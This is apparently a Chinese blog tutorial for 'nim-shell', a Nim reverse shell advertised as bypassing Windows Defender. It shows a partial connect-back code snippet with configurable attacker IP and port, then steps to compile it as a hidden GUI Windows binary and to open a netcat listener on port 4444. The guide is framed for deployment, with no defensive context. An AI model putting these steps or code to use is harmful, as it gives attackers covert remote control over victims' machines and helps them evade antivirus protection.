Nim-Shell 项目使用教程

Nim-Shell 项目使用教程

nim-shellReverse shell that can bypass windows defender detection项目地址:https://gitcode.com/gh_mirrors/ni/nim-shell

1. 项目的目录结构及介绍

nim-shell/
├── LICENSE
├── README.md
├── nim.png
├── nimshell.nim
└── ...
  • LICENSE: 项目许可证文件,采用MIT许可证。
  • README.md: 项目说明文档,包含项目的基本信息和使用说明。
  • nim.png: 项目相关的图片文件。
  • nimshell.nim: 项目的主代码文件,用于生成反向shell。

2. 项目的启动文件介绍

项目的主启动文件是 nimshell.nim。该文件包含了生成反向shell的主要逻辑和配置。以下是文件的关键部分:

# nimshell.nim

import os, net, nativesockets, times, strutils, base64

# 配置部分
let ip = "127.0.0.1"  # 需要修改为目标IP地址
let port = 4444       # 需要修改为目标端口号

# 反向shell逻辑
proc connectBack(ip: string, port: int) =
    var socket = newSocket()
    socket.connect(ip, Port(port))
    ...

connectBack(ip, port)

在启动文件中,需要修改 ipport 变量以匹配目标服务器的IP地址和端口号。

3. 项目的配置文件介绍

项目没有单独的配置文件,所有的配置都在 nimshell.nim 文件中进行。主要配置项包括:

  • IP地址: 目标服务器的IP地址,需要在代码中手动修改。
  • 端口号: 目标服务器的端口号,需要在代码中手动修改。

编译和运行

  1. 安装Nim编译器:

    $ apt install nim
    
  2. 编译项目:

    $ nim c -d:mingw --app:gui nimshell.nim
    
  3. 修改配置:

    • 打开 nimshell.nim 文件,修改 ipport 变量为目标服务器的IP地址和端口号。
  4. 启动监听:

    $ nc -nvlp 4444
    

通过以上步骤,您可以成功编译并运行 nim-shell 项目,实现反向shell连接。

nim-shellReverse shell that can bypass windows defender detection项目地址:https://gitcode.com/gh_mirrors/ni/nim-shell

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

尤琦珺Bess

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值